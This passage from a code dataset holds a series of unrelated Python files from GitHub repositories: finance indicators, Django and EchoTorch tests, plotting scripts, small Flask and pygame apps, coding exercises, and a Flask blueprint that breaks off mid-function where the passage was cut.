data\n    :return:\n    \"\"\"\n    df = ak.fund_etf_category_sina(symbol='ETF基金')\n    df = df.rename(columns={'代码': 'security', '最新价': 'last_price'})\n    result = df.loc[df['security'] == security]\n    return result\n\n\n# Compute the Williams %R indicator\ndef get_william(security, n=14):\n    data = attribute_history_etf(security, n, unit='1d', fields=['date', 'high', 'low', 'close'])\n    # print(data)\n    high = data.high.values\n    # print(high)\n    low = data.low.values\n    # print(low)\n    # Max of the highs and min of the lows over the window\n    high_max = np.max(high)\n    low_min = np.min(low)\n    # print(high_max)\n    # print(low_min)\n    # Williams %R\n    william = 100 * (high_max - data.close.values[-1]) / (high_max - low_min)\n    # print(william)\n    # (4132.295 - 4100.148) / (4132.295 - 3983.896)\n    return william\n\n\nif __name__ == '__main__':\n    # data = attribute_history_etf('sh510300', 5, unit='1d', fields=['date', 'open', 'high', 'low', 'close', 'volume'])\n    # print(data)\n    # print(data.close.values[-1])\n    # adr = 100 * (data.close.values[-1] - data.close.values[-2]) / data.close.values[-2]\n    # print(adr)\n    # data = get_current_data('sh510300').last_price.values[0]\n    # print(data)\n    wr1 = get_william('sh000300', 14)\n    # wr2 = get_william('sh000300', 21)\n    # print(f'WR1: {wr1}, WR2: {wr2}')\n","repo_name":"MagiCiAn1/MagicTrader","sub_path":"data/akshare_data.py","file_name":"akshare_data.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"40428239851","text":"import pytest\n\n\n@pytest.mark.parametrize(\"name, status_code\", [(\"Choco\", 201), (\"Test\", 422)])\n@pytest.mark.django_db\ndef test_save_choco(client, name, status_code):\n    data = {\n        \"name\": name,\n        \"description\": \"test address\",\n        \"price\": 100\n    }\n    response = client.post(\"/chocolate/create/\", data=data)\n    assert response.status_code == status_code\n","repo_name":"skypro-008/lesson31-and-tests","sub_path":"solution/my_project_part_2/name_template/template_test.py","file_name":"template_test.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"17267571282","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\n\r\n#Import what I need\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom math import log, e, ceil, floor,sqrt,pi,exp\r\nimport numpy as np\r\nfrom numpy import arange,array, empty\r\nimport pdb\r\nfrom random import randint\r\nimport copy\r\nfrom operator import add \r\nimport scipy\r\nfrom scipy.optimize import curve_fit\r\nimport numpy as np\r\n\r\n\r\n\r\ndef walk(n):\r\n\r\n    time = 0 \r\n    i = 0 \r\n    while i < n:\r\n        if i == 0: \r\n            r = random.random() \r\n            t = -log(1-r,e) \r\n            time = time+t \r\n            i=i+1\r\n        \r\n        elif i !=0 and i!=n-1 : \r\n            r_2 = random.random()\r\n            t_2 = -log(1-r_2,e)\r\n            time = time+t_2\r\n            \r\n            R = random.random() \r\n            if 0 <= R < 0.5: \r\n                i = i -1 \r\n            elif 0.5 <= R <=1:\r\n                i=i+1 \r\n        else: \r\n            i = n\r\n    return time\r\n\r\n\r\n\r\ndef many_walks(n,m):\r\n    v_t = [] \r\n    for i in range(m):\r\n        w = walk(n)\r\n        v_t.append(w)\r\n        \r\n    return v_t \r\n# So up till here, I managed to generate the vector that I want, i.e. v_t \r\nn = 20\r\nm = 2000 \r\nbins = [10*i for i in range(2000)] \r\nnumpy_hist = plt.figure() \r\nplt.hist(many_walks(n,m), bins)\r\n# Up till here, I have basically plotted a histogram using the vector v_t. (on python, the histogram comes out so it should be correct)\r\ndef func(x,s):\r\n    x = np.array(x)\r\n    return (4/(x*np.sqrt(np.pi*n*s)))*np.exp(-(np.log(x)**2)/(2*n*s))\r\n#Up until here I defined the function func, this is the function that I want to fit on my histogram. Notice that there is also a parameter n\r\n# this n is exactly the same n that we have in walks(n) and many_walks(n,m). But as you see I've specified n =20, so that should be fine I think.\r\n\r\nxx = np.linspace(0.1,2000,10000) # I made this in order to plot the function func but no idea if it will work tbh. 
After Here I got lost\r\n\r\n\r\n\r\n \r\n# The original call passed the bin edges and the raw walk times straight to curve_fit,\r\n# which is not a valid (x, y) pair. Build the normalized histogram first and fit\r\n# func to the counts at the bin centres.\r\ncounts, bin_edges = np.histogram(many_walks(n,m), bins=bins, density=True)\r\nbin_centers = 0.5 * (np.array(bin_edges[:-1]) + np.array(bin_edges[1:]))\r\npopt, pcov = curve_fit(func, bin_centers, counts) \r\n# I would like to use curve_fit to find s such that func fits the curve\r\n'''\r\nx = np.linspace(0,2000,10000) \r\ny = func(x,*popt)\r\n'''\r\n","repo_name":"mce1g15/BioPython","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"14469075417","text":"# coding=utf-8\nimport matplotlib.pyplot as plt\n\ndecisionNode = dict(boxstyle=\"sawtooth\", fc=\"0.8\")\nleafNode = dict(boxstyle=\"round4\", fc=\"0.8\")\narrow_args = dict(arrowstyle=\"<-\")\n\n\ndef plotNode(nodeTxt: str, centerPt: tuple, parentPt: tuple, nodeType: dict):\n    '''\n    Draw a node\n    :param nodeTxt: node text\n    :param centerPt: arrow end point\n    :param parentPt: arrow start point\n    :param nodeType: node style\n    :return:\n    '''\n    create_plot.ax1.annotate(nodeTxt, xy=parentPt, xycoords='axes fraction', xytext=centerPt,\n                             textcoords='axes fraction',\n                             va='center', ha=\"center\", bbox=nodeType, arrowprops=arrow_args)\n\n\ndef get_leaf_num(tree):\n    '''\n    Get the number of leaf nodes of the tree\n    :param tree:\n    :return:\n    '''\n    leaf_num = 0\n    first_str = list(tree.keys())[0]\n    second_dict = tree[first_str]\n    for k in second_dict.keys():\n        k_ = second_dict[k]\n        if type(k_).__name__ == 'dict':\n            leaf_num += get_leaf_num(k_)\n        else:\n            leaf_num += 1\n    return leaf_num\n\n\ndef get_tree_depth(tree):\n    '''\n    Get the depth of the tree\n    :param tree:\n    :return:\n    '''\n    max_depth = 0\n    first_str = list(tree.keys())[0]\n    second_dict = tree[first_str]\n    for k in second_dict.keys():\n        k_ = second_dict[k]\n        if type(k_).__name__ == 'dict':\n            this_depth = 1 + get_tree_depth(k_)\n        else:\n            this_depth = 1\n\n        if this_depth > max_depth:\n            max_depth = this_depth\n    return max_depth\n\n\ndef plotTree(myTree, parentPt, nodeTxt):\n    '''\n    Draw one tree\n    :param myTree:\n    :param parentPt: coordinates of the start point\n    :param nodeTxt: label text\n    :return:\n    '''\n    leaf_num = get_leaf_num(myTree)\n    depth = get_tree_depth(myTree)\n    first_str = list(myTree.keys())[0]\n    # center start point of the subtree\n    center_pt = (plotTree.xOff + (1.0 + float(leaf_num)) / 2.0 / plotTree.totalW, plotTree.yOff)\n    plotMidText(center_pt, parentPt, nodeTxt)\n    plotNode(first_str, center_pt, parentPt, decisionNode)\n    second_dict = myTree[first_str]\n    plotTree.yOff -= 1.0 / plotTree.totalD\n    for key in second_dict.keys():\n        if type(second_dict[key]).__name__ == 'dict':\n            plotTree(second_dict[key], center_pt, str(key))\n        else:\n            plotTree.xOff = plotTree.xOff + 1.0 / plotTree.totalW\n            plotNode(second_dict[key], (plotTree.xOff, plotTree.yOff), center_pt, leafNode)\n            plotMidText((plotTree.xOff, plotTree.yOff), center_pt, str(key))\n\n    plotTree.yOff = plotTree.yOff + 1.0 / plotTree.totalD\n\n\ndef plotMidText(cntrPt, parentPt, txtString):\n    '''\n    Fill in the text between parent and child nodes\n    :param cntrPt:\n    :param parentPt:\n    :param txtString:\n    :return:\n    '''\n    xMid = (parentPt[0] - cntrPt[0]) / 2.0 + cntrPt[0]\n    yMid = (parentPt[1] - cntrPt[1]) / 2.0 + cntrPt[1]\n    # draw a text label\n    create_plot.ax1.text(xMid, yMid, txtString)\n\n\ndef create_plot(intree):\n    # new figure\n    fig = plt.figure(1, facecolor='white')\n    # clear the drawing area\n    fig.clf()\n    axprops = dict(xticks=[], yticks=[])\n    # global variable\n    create_plot.ax1 = plt.subplot(111, frameon=False, **axprops)\n\n    # draw a node\n    # plotNode('a decision node', (0.5, 0.1), (0.1, 0.5), decisionNode)\n    # draw a node\n    # plotNode('a leaf node', (0.8, 0.1), (0.3, 0.8), leafNode)\n\n\n    # tree width\n    plotTree.totalW = float(get_leaf_num(intree))\n    # tree depth\n    plotTree.totalD = float(get_tree_depth(intree))\n\n    plotTree.xUnit = 1/plotTree.totalW\n    plotTree.yUnit = 1/plotTree.totalD\n\n    # initialize the coordinate offsets\n    plotTree.xOff = -0.5 / plotTree.totalW\n    plotTree.yOff = 1.0\n\n    parentPt = (0.5, 1.0)\n    plotTree(intree, parentPt, '')\n    plt.show()\n\n\nif __name__ == '__main__':\n    import mlInAction.trees as tree\n    ds, fea_names = tree.create_dataset()\n    intree = tree.create_tree(ds, fea_names)\n    intree['no surfacing'][3] = 'maybe'\n    create_plot(intree)\n","repo_name":"zhengwei223/thinkstats","sub_path":"mlInAction/treeplotter.py","file_name":"treeplotter.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"11283502275","text":"#!/usr/bin/python3\nimport argparse\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\n\ndef get_wer(best_wer_file):\n    with open(best_wer_file) as f_in:\n        wer_line = f_in.read()\n    return float(wer_line.split(' ')[1])\n\n\ndef trend_curve(x, a, b, c):\n    return a * x ** 2 + b * x + c\n\n\ndef main():\n    wers = []\n    wers_best = []\n    for num in range(500, 5500, 100):\n        best_wer_file = '{}/decode/scoring_kaldi/best_wer'.format(num)\n        wers.append((num, get_wer(best_wer_file)))\n        if num in [2100, 2600, 3700]:\n            wers_best.append((num, get_wer(best_wer_file)))\n\n    X_labels, Y = map(list, zip(*wers))\n    X_labels_best, Y_best = map(list, zip(*wers_best))\n\n    N = len(wers)\n    X = np.arange(N) # the x locations for the groups\n    X_best = [X_labels.index(x_label) for x_label in X_labels_best]\n    plt.plot(X, Y, 'bo', label='wyniki modeli')\n    plt.plot(X_best, Y_best, 'ro', label='wyniki najlepszych modeli')\n\n    popt, pcov = curve_fit(trend_curve, X, Y)\n    xx = np.linspace(0, N, 1000)\n    yy = trend_curve(xx, *popt)\n    plt.plot(xx, yy, 'k--', label='linia trendu')\n\n    plt.ylabel('WER [%]')\n    plt.xlabel('Liczba rozkładów Gaussa')\n    plt.xticks(X[::2], X_labels[::2], rotation='vertical')\n    plt.legend()\n    plt.show()\n\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jfajkowski/asr-builder","sub_path":"local/plot/plot_mono_experiment.py","file_name":"plot_mono_experiment.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"24571405474","text":"from echotorch.datasets.NARMADataset import NARMADataset\nimport echotorch.utils.optimization as optim\nimport torch\nimport random\nfrom torch.autograd import Variable\nfrom torch.utils.data.dataloader import DataLoader\nimport echotorch.nn.reservoir as etrs\nimport echotorch.utils\nimport numpy as np\nfrom . 
import EchoTorchTestCase\n\n\n# Test cases : Hyper-parameters optimization\nclass Test_Hyperparameters_Optimization(EchoTorchTestCase):\n \"\"\"\n Hyper-parameters optimization\n \"\"\"\n\n # region PRIVATE\n\n # Function to test the ESN on the NARMA-10 task\n def _evaluation_NARMA10(self, parameters, datasets, n_samples=5):\n \"\"\"\n Test the ESN with specific parameters on NARMA-10\n :param parameters: Dictionary with parameters values\n :param datasets: The dataset for the evaluation\n :param n_samples: How many samples to test the model ?\n :return: A tuple (model, fitness value)\n \"\"\"\n # Batch size (how many sample processed at the same time?)\n batch_size = 1\n\n # Reservoir hyper-parameters\n spectral_radius = parameters['spectral_radius']\n leaky_rate = parameters['leaky_rate']\n input_dim = 1\n reservoir_size = parameters['reservoir_size']\n connectivity = parameters['connectivity']\n ridge_param = parameters['ridge_param']\n input_scaling = parameters['input_scaling']\n bias_scaling = parameters['bias_scaling']\n\n # Data loader\n trainloader = DataLoader(datasets[0], batch_size=batch_size, shuffle=False, num_workers=1)\n testloader = DataLoader(datasets[1], batch_size=batch_size, shuffle=False, num_workers=1)\n\n # Average NRMSE\n NRMSE_average = 0.0\n\n # For each samples\n for n in range(n_samples):\n # Internal matrix\n w_generator = echotorch.utils.matrix_generation.NormalMatrixGenerator(\n connectivity=connectivity,\n spetral_radius=spectral_radius\n )\n\n # Input weights\n win_generator = echotorch.utils.matrix_generation.NormalMatrixGenerator(\n connectivity=connectivity,\n scale=input_scaling,\n apply_spectral_radius=False\n )\n\n # Bias vector\n wbias_generator = echotorch.utils.matrix_generation.NormalMatrixGenerator(\n connectivity=connectivity,\n scale=bias_scaling,\n apply_spectral_radius=False\n )\n\n # Create a Leaky-integrated ESN,\n # with least-square training algo.\n # esn = etrs.ESN(\n esn = etrs.LiESN(\n input_dim=input_dim,\n hidden_dim=reservoir_size,\n output_dim=1,\n leaky_rate=leaky_rate,\n learning_algo='inv',\n w_generator=w_generator,\n win_generator=win_generator,\n wbias_generator=wbias_generator,\n ridge_param=ridge_param\n )\n\n # For each batch\n for data in trainloader:\n # Inputs and outputs\n inputs, targets = data\n\n # Transform data to Variables\n inputs, targets = Variable(inputs), Variable(targets)\n\n # ESN need inputs and targets\n esn(inputs, targets)\n # end for\n\n # Now we finalize the training by\n # computing the output matrix Wout.\n esn.finalize()\n\n # Get the first sample in test set,\n # and transform it to Variable.\n dataiter = iter(testloader)\n test_u, test_y = dataiter.next()\n test_u, test_y = Variable(test_u), Variable(test_y)\n\n # Make a prediction with our trained ESN\n y_predicted = esn(test_u)\n\n # Add to sum of NRMSE\n NRMSE_average += echotorch.utils.nrmse(y_predicted.data, test_y.data)\n # end for\n\n # Print test MSE and NRMSE\n return esn, NRMSE_average / n_samples\n # end evaluation_NARMA10\n\n # endregion PRIVATE\n\n # region TESTS\n\n # Test genetic optimization on NARMA-10\n def test_genetic_optimization_NARMA10(self):\n \"\"\"\n Test genetic optimization on NARMA-10\n \"\"\"\n # Debug ?\n debug = False\n\n # Length of training samples\n train_sample_length = 5000\n\n # Length of test samples\n test_sample_length = 1000\n\n # How many training/test samples\n n_train_samples = 1\n n_test_samples = 1\n\n # Manual seed initialisation\n echotorch.utils.random.manual_seed(1)\n\n # Get a random 
optimizer\n random_optimizer = optim.optimizer_factory.get_optimizer(\n 'genetic',\n iterations=2\n )\n\n # NARMA10 dataset\n narma10_train_dataset = NARMADataset(train_sample_length, n_train_samples, system_order=10)\n narma10_test_dataset = NARMADataset(test_sample_length, n_test_samples, system_order=10)\n\n # Parameters ranges\n param_ranges = dict()\n param_ranges['spectral_radius'] = np.linspace(0, 2.0, 1000)\n param_ranges['leaky_rate'] = np.linspace(0.1, 1.0, 1000)\n param_ranges['reservoir_size'] = np.arange(50, 510, 10)\n param_ranges['connectivity'] = np.linspace(0.1, 1.0, 1000)\n param_ranges['ridge_param'] = np.logspace(-10, 2, base=10, num=1000)\n param_ranges['input_scaling'] = np.linspace(0.1, 1.0, 1000)\n param_ranges['bias_scaling'] = np.linspace(0.0, 1.0, 1000)\n\n # Launch the optimization of hyper-parameter\n _, best_param, best_NRMSE = random_optimizer.optimize(\n self._evaluation_NARMA10,\n param_ranges,\n (narma10_train_dataset, narma10_test_dataset),\n n_samples=5\n )\n\n # Show the result\n if debug:\n print(\"Best hyper-parameters found : {}\".format(best_param))\n print(\"Best NRMSE : {}\".format(best_NRMSE))\n # end if\n\n # Test the NRMSE found with optimization\n self.assertLessEqual(\n best_NRMSE,\n 0.5,\n msg=\"NRMSE to high for genetic optimisation, check the implementation!\"\n )\n # end test_genetic_optimization_NARMA10\n\n # Test grid search optimization on NARMA10\n def test_grid_search_optimization_NARMA10(self):\n \"\"\"\n Test grid search optimization on NARMA10\n \"\"\"\n # Debug?\n debug = False\n\n # Length of training samples\n train_sample_length = 5000\n\n # Length of test samples\n test_sample_length = 1000\n\n # How many training/test samples\n n_train_samples = 1\n n_test_samples = 1\n\n # Manual seed initialisation\n echotorch.utils.random.manual_seed(1)\n\n # Get a random optimizer\n random_optimizer = optim.optimizer_factory.get_optimizer('grid-search')\n\n # NARMA10 dataset\n narma10_train_dataset = NARMADataset(train_sample_length, n_train_samples, system_order=10)\n narma10_test_dataset = NARMADataset(test_sample_length, n_test_samples, system_order=10)\n\n # Parameters ranges\n param_ranges = dict()\n param_ranges['spectral_radius'] = np.arange(0, 1.1, 0.5)\n param_ranges['leaky_rate'] = np.arange(0.1, 1.1, 0.5)\n param_ranges['reservoir_size'] = np.arange(100, 510, 200)\n param_ranges['connectivity'] = np.arange(0.1, 1.0, 0.4)\n param_ranges['ridge_param'] = np.logspace(-10, 2, base=10, num=2)\n param_ranges['input_scaling'] = np.arange(0.1, 1.1, 0.4)\n param_ranges['bias_scaling'] = np.arange(0.0, 1.1, 0.5)\n\n # Launch the optimization of hyper-parameters\n _, best_param, best_NRMSE = random_optimizer.optimize(\n self._evaluation_NARMA10,\n param_ranges,\n (narma10_train_dataset, narma10_test_dataset),\n n_samples=1\n )\n\n # Show the result\n if debug:\n print(\"Best hyper-parameters found : {}\".format(best_param))\n print(\"Best NRMSE : {}\".format(best_NRMSE))\n # end if\n\n # Test the NRMSE of the ESN found with optimization\n # self.assertAlmostEqual(best_NRMSE, 1.553938488748105, places=2)\n self.assertLessEqual(\n best_NRMSE,\n 1.6,\n msg=\"NRMSE to high for grid optimisation, check the implementation!\"\n )\n # end test_grid_search_optimization_NARMA10\n\n # Test random optimization on NARMA10\n def test_random_optimization_NARMA10(self):\n \"\"\"\n Test random optimization on NARMA10\n \"\"\"\n # Debug?\n debug = False\n\n # Length of training samples\n train_sample_length = 5000\n\n # Length of test samples\n 
test_sample_length = 1000\n\n        # How many training/test samples\n        n_train_samples = 1\n        n_test_samples = 1\n\n        # Manual seed initialisation\n        echotorch.utils.random.manual_seed(1)\n\n        # Get a random optimizer\n        random_optimizer = optim.optimizer_factory.get_optimizer('random', R=50)\n\n        # NARMA10 dataset\n        narma10_train_dataset = NARMADataset(train_sample_length, n_train_samples, system_order=10)\n        narma10_test_dataset = NARMADataset(test_sample_length, n_test_samples, system_order=10)\n\n        # Parameters ranges\n        param_ranges = dict()\n        param_ranges['spectral_radius'] = np.arange(0, 1.1, 0.1)\n        param_ranges['leaky_rate'] = np.arange(0.1, 1.1, 0.1)\n        param_ranges['reservoir_size'] = np.arange(50, 500, 50)\n        param_ranges['connectivity'] = np.arange(0.1, 1.0, 0.1)\n        param_ranges['ridge_param'] = np.logspace(-10, 2, base=10, num=10)\n        param_ranges['input_scaling'] = np.arange(0.1, 1.1, 0.1)\n        param_ranges['bias_scaling'] = np.arange(0.0, 1.1, 0.1)\n\n        # Launch the optimization of hyper-parameters\n        _, best_param, best_NRMSE = random_optimizer.optimize(\n            self._evaluation_NARMA10,\n            param_ranges,\n            (narma10_train_dataset, narma10_test_dataset),\n            n_samples=5\n        )\n\n        # Show the result\n        if debug:\n            print(\"Best hyper-parameters found : {}\".format(best_param))\n            print(\"Best NRMSE : {}\".format(best_NRMSE))\n        # end if\n\n        # Test the NRMSE of the ESN found with optimization\n        # self.assertAlmostEqual(best_NRMSE, 0.49092315487463206, places=1)\n        self.assertLessEqual(\n            best_NRMSE,\n            0.5,\n            msg=\"NRMSE too high for random optimisation, check the implementation!\"\n        )\n        # end test_random_optimization_NARMA10\n\n    # endregion TESTS\n\n# end Test_Hyperparameters_Optimization\n","repo_name":"nschaetti/EchoTorch","sub_path":"test/test_hyperparameters_optimization.py","file_name":"test_hyperparameters_optimization.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"52"}
{"seq_id":"75228360164","text":"import pickle\n\nimport numpy as np # np.array is used in predict() below; the unused 'click' import was removed\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\nmodel = pickle.load(open('models/stacking.pkl', 'rb'))\n\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n    int_features = [float(x) for x in request.form.values()]\n    final_features = [np.array(int_features)]\n    prediction = model.predict(final_features)\n    output = prediction #round(prediction[0], 2) \n    return render_template('index.html', prediction_text='Genetic Disorder Label :{}'.format(output))\n\napp.run()\n\n\n","repo_name":"DimaRossikhin/MyFirstDataProject2","sub_path":"flask_docker/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"9776819649","text":"import pygame\n\npygame.init() # initialization (required)\n\n# set the screen size\nscreen_width = 480 # width\nscreen_height = 640 # height\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n# window title\npygame.display.set_caption(\"나도 게임\")\n\n# load the background image\nbackground = pygame.image.load(\"D:/Workspaces/python_game/pygame_basic/background.png\")\n\n# event loop\nrunning = True # is the game still running?\n\nwhile running:\n    for event in pygame.event.get(): # which event occurred?\n        if event.type == pygame.QUIT: # was the window-close event raised?\n            running = False\n    \n    #screen.blit(background, (0, 0)) # draw the background\n    screen.fill((0, 0, 255))\n    \n    pygame.display.update() # redraw the game screen!\n\n# quit pygame\npygame.quit()","repo_name":"jajaec/study","sub_path":"python_game/pygame_basic/2_background.py","file_name":"2_background.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"1818140100","text":"import math\n\ndef chk_devisor(num):\n    limit = math.ceil(math.sqrt(num))\n    result = set()\n    for i in range(1, limit+1):\n        q, r = divmod(num, i)\n        if r == 0:\n            result.add(q)\n            result.add(i)\n    if len(result) % 2 == 0:\n        result = num\n    else:\n        result = -num\n    return result\n\n\ndef solution(left, right):\n    answer = 0\n    for num in range(left, right+1):\n        result = chk_devisor(num)\n        answer += result\n    return answer","repo_name":"LeeHyeonKyu/Coding-Practice","sub_path":"Programmers/월간 코드 챌린지 시즌2/약수의 개수와 덧셈.py","file_name":"약수의 개수와 덧셈.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"7365861419","text":"import vapoursynth as vs\nfrom vapoursynth import core\n\ndef rekt(src, fix, left=0, top=0, right=0, bottom=0):\n    '''Creates a rectangular \"mask\" for a fix to be applied to.'''\n\n    if left > 0 or right > 0:\n        m = core.std.Crop(fix, left=left, right=right)\n        l = core.std.Crop(src, right=src.width - left) if left > 0 else 0\n        r = core.std.Crop(src, left=src.width - right) if right > 0 else 0\n        params = [x for x in [l, m, r] if x != 0]\n        m = core.std.StackHorizontal(params)\n    else:\n        m = fix\n    if top > 0 or bottom > 0:\n        t = core.std.Crop(src, bottom=src.height - top) if top > 0 else 0\n        m = core.std.Crop(m, bottom=bottom, top=top)\n        b = core.std.Crop(src, top=src.height - bottom) if bottom > 0 else 0\n        params = [x for x in [t, m, b] if x != 0]\n        m = core.std.StackVertical(params)\n    return m\n","repo_name":"Selur/VapoursynthScriptsInHybrid","sub_path":"rekt.py","file_name":"rekt.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"52"}
{"seq_id":"21455255593","text":"# 1) Read integers from the user and store them in a list. Make the number 0 end the input loop. After that, print the largest value in the list using the sorted() and len() functions. 
Finally, use reversed() to invert the list and get, by index, its middle value.\n# note - If the list has an even number of values, take the average of the two central values\n\n\n# my solution\n\n\nlista = []\nnum = 1\nwhile num != 0:\n    num = int(input('Digite um ou mais Numeros : '))\n    if num != 0:\n        lista.append(num)\n\nprint(f'Lista: {lista}')\n\nordenada = sorted(lista)\nprint(f'Lista ordenada: {ordenada}')\nmaiorElementoUsandoLen = ordenada[len(lista) - 1]\nprint(f'O maior elemento da lista {ordenada} é {maiorElementoUsandoLen}')\n\nreversa = reversed(ordenada)\nlistaReversa = list(reversa)\n\nprint(f'Lista ordenada Reversa: {listaReversa}')\n\nif (len(listaReversa) + 1 ) % 2 == 0:\n    indice = (len(listaReversa ) + 1) // 2\n    elementoDoMeio = listaReversa[indice - 1]\n    print(f'O elemento do meio é : {elementoDoMeio}')\n    \nelif (len(listaReversa) + 1 ) % 2 != 0:\n    indiceOrdenada = (len(ordenada) + 1 ) // 2 \n    indiceReversa = (len(listaReversa) + 1) // 2\n    print(f'Numero do meio na lista Ordenada : {ordenada[indiceOrdenada - 1]}')\n    print(f'Numero do meio lista reversa : {listaReversa[indiceReversa - 1]}')\n    # parentheses added: // binds tighter than +, so the original expression did not average the two values\n    media = (ordenada[indiceOrdenada - 1] + listaReversa[indiceReversa - 1]) // 2\n    print(f'A media dos dois numeros do meio é : {media}')\n    \n    \n    \n# instructor's solution\n\nnumeroInt = 1\nlistaNumeros = []\n\nwhile numeroInt != 0:\n    numeroInt = int(input('Digite um numero inteiro: '))\n    if numeroInt != 0:\n        listaNumeros.append(numeroInt)\n\nordenada = sorted(listaNumeros)\ntamanho = len(listaNumeros)\n\nprint(f'Maior valor: {ordenada[tamanho - 1]}')\n\ninvertida = reversed(ordenada)\nlistaInvertida = list(invertida)\n\nif tamanho % 2 == 1:\n    print(f'Valor intermediario: {listaInvertida[tamanho // 2]}')\nelse:\n    print(f'Media dos valores intermediarios: {(listaInvertida[tamanho // 2] + listaInvertida[(tamanho//2) -1 ]) // 2} ')\n    \n","repo_name":"castrintt/curso-python","sub_path":"funcoes-aplicaveis/exercicio-sorted-reversed.py","file_name":"exercicio-sorted-reversed.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"44212332787","text":"# Author: gw\r\n# Created: 2019-07-04 16:25\r\n# File: 鸡鸭分类.py\r\nimport sys\r\n\r\na = sys.stdin.readline().strip()\r\n\r\nres = 0\r\nl = 0\r\nfor i in range(len(a)):\r\n    if a[i] == 'C':\r\n        res = res + i - l\r\n        l = l + 1\r\nprint(res)","repo_name":"1325075688gw/argorm","sub_path":"鸡鸭分类.py","file_name":"鸡鸭分类.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"74836766565","text":"from flask import Blueprint, render_template, jsonify, request\nfrom flask_login import login_required, current_user\nfrom models import (db, HistoryTable, Siila1Table, Siila2Table, Siila3Table, \n                    RegionTable, MarketTable, CadastreTable, ContactTable, IndustryTable)\nfrom utils import get_menu_context\nfrom datetime import datetime\nfrom models.logs_table import LogsTable\nfrom sqlalchemy import cast, String, join\n\nhistory_bp = Blueprint('history_table', __name__)\n\n@history_bp.route('/history_table')\n@login_required\ndef history_table():\n    current_table, tables = get_menu_context('History Table')\n    market_names = [row.MARKET_NAME for row in db.session.query(MarketTable.MARKET_NAME).distinct()]\n    return render_template('group1/history_table.html', tables=tables, current_table=current_table, 
market_names=market_names)\n\n@history_bp.route('/get_history_data')\n@login_required\ndef get_history_data():\n property_type = request.args.get('propertyType')\n market_name = request.args.get('marketName')\n\n # Join necessary tables to retrieve all fields\n history_data = db.session.query(\n HistoryTable.SIILA1_ID,\n HistoryTable.ID_UNIQUE,\n Siila1Table.SIILA1_NAME,\n Siila2Table.SIILA2_NAME,\n Siila3Table.SIILA3_NAME,\n RegionTable.REGION_NAME,\n HistoryTable.PERIOD,\n CadastreTable.CADASTRE_NAME.label(\"OWNER_NAME\"),\n CadastreTable.CAD_GROUP.label(\"OWNER_GROUP\"),\n ContactTable.CONTACT_NAME.label(\"CONTACT_NAME\"),\n ContactTable.CONTACT_PHONE.label(\"CONTACT_PHONE\"),\n ContactTable.CONTACT_EMAIL.label(\"CONTACT_EMAIL\")\n ).join(\n Siila1Table, HistoryTable.SIILA1_ID == Siila1Table.SIILA1_ID\n ).join(\n RegionTable, Siila1Table.REGION_ID == RegionTable.REGION_ID\n ).join(\n MarketTable, RegionTable.MARKET_ID == MarketTable.MARKET_ID\n ).join(\n Siila2Table, HistoryTable.SIILA2_ID == Siila2Table.SIILA2_ID\n ).join(\n Siila3Table, HistoryTable.SIILA3_ID == Siila3Table.SIILA3_ID\n ).join(\n CadastreTable, HistoryTable.ID_OWNER == CadastreTable.CADASTRE_ID\n ).join(\n ContactTable, HistoryTable.ID_CONT_OWNER == ContactTable.CONTACT_ID\n ).filter(\n Siila1Table.PROPERTY_TYPE == property_type,\n MarketTable.MARKET_NAME == market_name\n ).all()\n\n # Convert the data to a list of dictionaries to be sent as JSON\n history_data = [{\n 'SIILA1_ID': row.SIILA1_ID,\n 'ID_UNIQUE': row.ID_UNIQUE,\n 'SIILA1_NAME': row.SIILA1_NAME,\n 'SIILA2_NAME': row.SIILA2_NAME,\n 'SIILA3_NAME': row.SIILA3_NAME,\n 'REGION_NAME': row.REGION_NAME,\n 'PERIOD': row.PERIOD,\n 'OWNER_NAME': row.OWNER_NAME,\n 'OWNER_GROUP': row.OWNER_GROUP,\n 'CONTACT_NAME': row.CONTACT_NAME,\n 'CONTACT_PHONE': row.CONTACT_PHONE,\n 'CONTACT_EMAIL': row.CONTACT_EMAIL\n } for row in history_data]\n\n return jsonify(history_data)\n\n@history_bp.route('/update_history_table', methods=['POST'])\n@login_required\ndef update_history_table():\n try:\n # Extract data from form\n table_id = request.form.get('table_id')\n column_name = request.form.get('column_name')\n new_value = request.form.get('new_value')\n user = current_user.username\n\n # Get the old value before updating\n old_value = 